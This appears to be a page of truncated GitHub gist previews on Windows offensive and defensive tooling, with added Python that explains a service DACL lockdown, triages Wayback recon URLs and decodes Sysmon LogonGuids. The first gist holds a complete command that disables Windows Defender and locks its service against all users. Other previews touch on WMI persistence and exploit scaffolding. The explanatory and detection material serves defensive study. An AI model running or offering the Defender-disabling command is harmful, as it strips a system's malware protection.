This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
```powershell
# Disable the Defender service and then lock its security descriptor: the DACL
# denies GENERIC_ALL (GA) to Everyone (WD) and to the OWNER RIGHTS SID (OW).
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
# Wrap the command in a scheduled task so it can be run under another identity
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
# Task Scheduler COM API; the identity the task is to run under is TrustedInstaller
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
```
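The SDDL string handed to `sc.exe sdset` above is what actually locks the service, and it is easy to misread because the same two letters mean different things in different fields (`WD` is WRITE_DAC in the rights field but Everyone in the SID field). The Python below is an added example, not code from the gist: it parses that string, maps the generic rights onto the service-specific rights the Service Control Manager uses (the `winsvc.h` values), and walks the DACL the way access checks do, to show that the two deny ACEs shut out even an elevated administrator. The "default" service DACL used as the comparison input is representative and constructed for this example, not captured from a host; `summarize`, `locked_out_principals` and the token SID sets are this example's own names.

```python
import re
from typing import Dict, List, NamedTuple, Set

# SDDL ACE types and rights abbreviations (subset that covers service ACEs).
ACE_TYPES = {"A": "allow", "D": "deny", "AU": "audit", "AL": "alarm"}
RIGHTS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x0001, "DC": 0x0002, "LC": 0x0004, "SW": 0x0008, "RP": 0x0010,
    "WP": 0x0020, "DT": 0x0040, "LO": 0x0080, "CR": 0x0100,
}
# How the SCM maps generic rights onto SERVICE_* rights (winsvc.h values):
# GA -> SERVICE_ALL_ACCESS, GR/GW/GX -> the documented read/write/execute sets.
SERVICE_GENERIC = {0x10000000: 0x000F01FF, 0x80000000: 0x0002008D,
                   0x40000000: 0x00020002, 0x20000000: 0x00020170}
SERVICE_QUERY_STATUS, SERVICE_CHANGE_CONFIG, SERVICE_STOP = 0x0004, 0x0002, 0x0020
# Well-known SID abbreviations: note "WD" here is Everyone, not WRITE_DAC.
SIDS = {"WD": "Everyone", "OW": "OWNER RIGHTS", "SY": "SYSTEM", "BA": "Administrators",
        "BU": "Users", "AU": "Authenticated Users", "IU": "Interactive", "SU": "Service"}


class Ace(NamedTuple):
    kind: str
    rights: int      # mask with generic bits already mapped to service rights
    sid: str


def map_generic(mask: int) -> int:
    for generic, specific in SERVICE_GENERIC.items():
        if mask & generic:
            mask = (mask & ~generic) | specific
    return mask


def parse_rights(field: str) -> int:
    if field.lower().startswith("0x"):
        mask = int(field, 16)
    else:
        mask = 0
        for i in range(0, len(field), 2):
            mask |= RIGHTS[field[i:i + 2]]    # KeyError on an unknown code
    return map_generic(mask)


def parse_sddl(sddl: str) -> Dict[str, object]:
    """Split the O:/G:/D:/S: sections and parse the DACL's ACEs in order."""
    parts = [p for p in re.split(r"(?=[OGDS]:)", sddl) if p]
    sections = {p[0]: p[2:] for p in parts}
    dacl = sections.get("D", "")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl):
        kind, _flags, rights, _obj, _inherit_obj, sid = body.split(";")
        aces.append(Ace(ACE_TYPES.get(kind, kind), parse_rights(rights), sid))
    return {"owner": sections.get("O"), "group": sections.get("G"),
            "dacl_flags": dacl.split("(")[0], "dacl": aces}


def access_check(aces: List[Ace], token_sids: Set[str], wanted: int) -> bool:
    """Simplified NT DACL walk: the first deny ACE for a token SID that overlaps
    the requested rights wins; allow ACEs accumulate until every requested bit
    is granted. An empty DACL grants nothing. (Owner-implied READ_CONTROL and
    WRITE_DAC and the OWNER RIGHTS override are not modelled here.)"""
    granted = 0
    for ace in aces:
        if ace.sid not in token_sids:
            continue
        if ace.kind == "deny" and ace.rights & wanted:
            return False
        if ace.kind == "allow":
            granted |= ace.rights
            if granted & wanted == wanted:
                return True
    return granted & wanted == wanted


def locked_out_principals(aces: List[Ace]) -> List[str]:
    """Detection helper: principals denied SERVICE_ALL_ACCESS outright."""
    return [SIDS.get(a.sid, a.sid) for a in aces
            if a.kind == "deny" and a.rights & 0x000F01FF == 0x000F01FF]


# The string from the gist, and a representative default service DACL
# (constructed for this example, not captured from a real host).
WINDEFEND_LOCKDOWN = "D:(D;;GA;;;WD)(D;;GA;;;OW)"
DEFAULT_SERVICE_SD = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                      "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
ADMIN_TOKEN = {"BA", "AU", "IU", "WD"}   # group SIDs in an elevated admin token
USER_TOKEN = {"BU", "AU", "IU", "WD"}    # group SIDs in a standard user token


def summarize(sddl: str, token_sids: Set[str]) -> Dict[str, object]:
    aces = parse_sddl(sddl)["dacl"]
    return {"query": access_check(aces, token_sids, SERVICE_QUERY_STATUS),
            "change_config": access_check(aces, token_sids, SERVICE_CHANGE_CONFIG),
            "stop": access_check(aces, token_sids, SERVICE_STOP),
            "locked_out": locked_out_principals(aces)}


if __name__ == "__main__":
    for name, sd in (("default", DEFAULT_SERVICE_SD), ("windefend lockdown", WINDEFEND_LOCKDOWN)):
        print(name, "admin:", summarize(sd, ADMIN_TOKEN))
        print(name, "user: ", summarize(sd, USER_TOKEN))
```

Because Everyone is present in practically every token, a deny of GENERIC_ALL to `WD` is evaluated before any allow and blocks every caller, which is why the gist needs TrustedInstaller rather than a plain administrator to apply it; a `locked_out` list that is not empty is also a cheap thing to alert on when auditing service security descriptors.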
| GUID | Name |
|---|---|
| 00000000-0000-0000-0000-000000000000 | Zero |
| 00000000-0000-0000-0000-000000000000 | EfiPartTypeUnused |
| 00000000-0000-0000-0000-000000000000 | EfiTpmDeviceInstanceNone |
| 00160F8D-2B35-4DF2-BBE0-B272A8D631F0 | FirmwarePerformanceDxe |
| 00214CC1-06D1-45FE-9700-DCA5726AD7BF | ArmVirtPlatformLib |
| 0049858F-8CA7-4CCD-918B-D952CBF32975 | VirtioFdtDxe |
| 0053D9D6-2659-4599-A26B-EF4536E631A9 | ShellAlias |
| 0065D394-9951-4144-82A3-0AFC8579C251 | EfiPeiRscHandlerPpi |
| 00720665-67EB-4A99-BAF7-D3C33A1C7CC9 | EfiTcp4ServiceBindingProtocol |
| 00C86DB8-013B-4FF4-B8E9-208F4FCF1C00 | LibSignal |
```python
import requests
import sys
import json

def waybackurls(host, with_subs):
    # Wayback Machine CDX API: fl=original returns the originally archived URL,
    # collapse=urlkey de-duplicates captures of the same URL; the '*.' prefix
    # widens the query to every subdomain of host.
    if with_subs:
        url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
    else:
        url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
```
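What the query above returns, and what a recon pass does with it, is easier to see offline. The Python below is an added example, not the gist's own code: it parses the `output=json&fl=original` shape the CDX endpoint returns (a JSON array whose first row is the field header) and triages the URLs into hosts, de-duplicated paths, sensitive-looking files and the query parameters each endpoint has been seen with. The response body is constructed for this example; `triage` and `INTERESTING_SUFFIXES` are this example's own names.

```python
import json
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the body the CDX endpoint returns with
# output=json&fl=original: a JSON array whose first row is the field header.
SAMPLE_CDX_RESPONSE = json.dumps([
    ["original"],
    ["http://example.com/"],
    ["http://example.com/admin/login.php"],
    ["http://example.com/backup/site.sql.bak"],
    ["http://example.com/api/v1/users?id=1"],
    ["https://example.com/api/v1/users?id=2&format=json"],
    ["http://static.example.com/js/app.js"],
])

# File suffixes worth a manual look when they show up in an archive.
INTERESTING_SUFFIXES = (".bak", ".sql", ".zip", ".tar.gz", ".env", ".config", ".old", ".swp")


def parse_cdx(text: str) -> List[str]:
    """Return the 'original' column; an empty body means no captures."""
    rows = json.loads(text) if text.strip() else []
    if not rows:
        return []
    header, *records = rows
    col = header.index("original")
    return [r[col] for r in records]


def triage(urls: List[str]) -> Dict[str, object]:
    """Collapse scheme and query variants, collect hosts (the '*.' wildcard in
    the query brings in subdomains), flag sensitive-looking files and record
    which query parameters each endpoint has been seen with."""
    paths, hosts, interesting, params = set(), set(), [], {}
    for u in urls:
        p = urlsplit(u)
        hosts.add(p.netloc)
        paths.add((p.netloc, p.path))
        if p.path.lower().endswith(INTERESTING_SUFFIXES):
            interesting.append(u)
        if p.query:
            params.setdefault(p.path, set()).update(parse_qs(p.query).keys())
    return {"hosts": sorted(hosts), "unique_paths": sorted(paths),
            "interesting": interesting,
            "params": {k: sorted(v) for k, v in params.items()}}


if __name__ == "__main__":
    report = triage(parse_cdx(SAMPLE_CDX_RESPONSE))
    for key, value in report.items():
        print(key, value)
```

Replacing `SAMPLE_CDX_RESPONSE` with `requests.get(url).text` from the function above is the only change needed to run this against the live API; keep `parse_cdx` tolerant of an empty body, because a host with no captures returns nothing rather than an empty array.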
```powershell
# These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry
# Each flag is one ETW keyword of the kernel registry provider; OR them together
# to select which registry operations a trace session will receive.
[Flags()]
enum RegistryOptions {
    CloseKey = 0x00000001
    QuerySecurityKey = 0x00000002
    SetSecurityKey = 0x00000004
    EnumerateValueKey = 0x00000010
    QueryMultipleValueKey = 0x00000020
    SetInformationKey = 0x00000040
    FlushKey = 0x00000080
```
```python
#!/usr/bin/env python
# coding=utf8
from pwn import p64, process, ELF
from time import sleep

# Target binary; ELF() parses its symbols and sections for address lookups
EXECUTABLE = '/home/unexploitable/unexploitable'
elf = ELF(EXECUTABLE)
```
```powershell
function Get-DelegateType
{
    Param
    (
        [OutputType([Type])]
```
```powershell
function New-ActiveScriptEventConsumerClass {
<#
.SYNOPSIS

Creates an ActiveScriptEventConsumer WMI class in the namespace of your choosing.

.DESCRIPTION

New-ActiveScriptEventConsumerClass creates a clone of the ActiveScriptEventConsumer WMI event consumer class using the class name and namespace name of your choosing.
```
```powershell
# Author: Matthew Graeber (@mattifestation)

# UNIX epoch, used to turn the timestamp embedded in the GUID into a date
$Epoch = Get-Date '01/01/1970'

# Conversion trick taken from https://blogs.technet.microsoft.com/heyscriptingguy/2017/02/01/powertip-convert-from-utc-to-my-local-time-zone/
$StrCurrentTimeZone = (Get-WmiObject Win32_timezone).StandardName
$TZ = [TimeZoneInfo]::FindSystemTimeZoneById($StrCurrentTimeZone)

# Parse out all the LogonGUID fields for sysmon ProcessCreate events
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } | ForEach-Object {
```
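The reason the gist needs an epoch and a time zone is that a Sysmon LogonGuid is not random: it packs a timestamp and the logon session ID into the GUID bytes. The Python below is an added example, not the gist's code, that decodes those fields and then groups constructed ProcessCreate records by logon session. The layout it assumes (bytes 4-7 of the `Guid.ToByteArray()` order hold a little-endian UNIX timestamp, bytes 12-15 the low 32 bits of the logon LUID) is an assumption to verify against your own events; the sample events, `decode_sysmon_guid` and `group_by_logon_session` are this example's own, and times are reported in UTC rather than converted to the local zone as the gist does.

```python
import struct
import uuid
from datetime import datetime, timezone
from typing import Dict, List


def sysmon_guid_bytes(guid_text: str) -> bytes:
    # UUID.bytes_le is Data1..Data3 little-endian followed by Data4 verbatim,
    # the same order .NET's Guid.ToByteArray() produces on Windows.
    return uuid.UUID(guid_text.strip("{}")).bytes_le


def decode_sysmon_guid(guid_text: str) -> Dict[str, object]:
    """Split a Sysmon LogonGuid (or ProcessGuid) into its parts.

    Assumed layout (verify against your own events): bytes 0-3 are
    machine-specific, bytes 4-7 a little-endian UNIX timestamp (logon time,
    or process start time for a ProcessGuid), bytes 12-15 the low 32 bits of
    the logon session LUID, i.e. the LogonId seen in 4624 events."""
    b = sysmon_guid_bytes(guid_text)
    machine, epoch = struct.unpack("<II", b[0:8])
    logon_id = struct.unpack("<I", b[12:16])[0]
    return {"machine": machine, "epoch": epoch,
            "time_utc": datetime.fromtimestamp(epoch, timezone.utc),
            "logon_id": logon_id}


# Constructed Event ID 1 records reduced to the two fields used here; the
# first GUID carries LUID 0x3e7 (the SYSTEM logon session).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "LogonGuid": "{365ABB72-D1A5-5B76-0000-0020E7030000}"},
    {"Image": r"C:\Windows\System32\cmd.exe",     "LogonGuid": "{365ABB72-E2C4-5B76-0000-0020A1B50300}"},
    {"Image": r"C:\Windows\System32\whoami.exe",  "LogonGuid": "{365ABB72-E2C4-5B76-0000-0020A1B50300}"},
]


def group_by_logon_session(events: List[Dict[str, str]]) -> Dict[int, Dict[str, object]]:
    """Bucket process creations by logon session so one session's activity
    (and when that session started) can be read as a unit."""
    sessions: Dict[int, Dict[str, object]] = {}
    for ev in events:
        d = decode_sysmon_guid(ev["LogonGuid"])
        s = sessions.setdefault(d["logon_id"],
                                {"logon_time_utc": d["time_utc"].isoformat(), "images": []})
        s["images"].append(ev["Image"])
    return sessions


if __name__ == "__main__":
    for logon_id, session in group_by_logon_session(SAMPLE_EVENTS).items():
        print(hex(logon_id), session)
```

Pairing the decoded LogonId with Security event 4624 (which carries the same LUID in its Logon ID field) is what links a Sysmon process tree back to the account, logon type and source address of the session that spawned it.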
```powershell
# This is really beta code used in my Detection Methodology post. I plan to write more efficient code when I get some more time.
function Get-ExtendedAttribute
{
    # Walks the whole volume and emits the extended attributes of every file,
    # tagging each result with the file it came from. The per-file
    # Get-ExtendedAttribute -FilePath implementation it calls is not shown in
    # this preview; as listed, the name collides with this wrapper.
    foreach($file in (Get-ChildItem -Path C:\ -Recurse))
    {
        $obj = Get-ExtendedAttribute -FilePath $file.FullName | Where-Object {$_ -ne $null}
        $obj | Add-Member -MemberType NoteProperty -Name FileName -Value $file.FullName
        Write-Output $obj
    }
```
```bash
function pop() {
    # sed prints the path only when it starts with /mnt/; zero bytes of output
    # means the current directory lives inside the WSL rootfs, not on a
    # Windows drive, so locate the distro's rootfs from the Windows side.
    if [ $(pwd | sed -n -e 's!^/mnt/!!p' | wc -c) == 0 ]
    then
        # cmd.exe output is written via a temp file and read back with
        # strings -a to strip the CRLF and encoding artefacts
        cmd.exe /c "echo %LOCALAPPDATA%" > /tmp/LOCALAPPDATA
        dest="$(strings -a /tmp/LOCALAPPDATA)\\Packages"
        # the Ubuntu store package directory holds the distro's LocalState\rootfs
        cmd.exe /c "dir $dest | findstr CanonicalGroupLimited" > /tmp/Canonical
        repo=$(strings -a /tmp/Canonical | awk '{print $NF}')
        root=$(echo "$dest\\$repo\\LocalState\\rootfs")
        # open the Linux cwd in Explorer, with / translated to \
        explorer.exe $(echo ${root}$(pwd | sed 's!/!\\!g'))
    else
```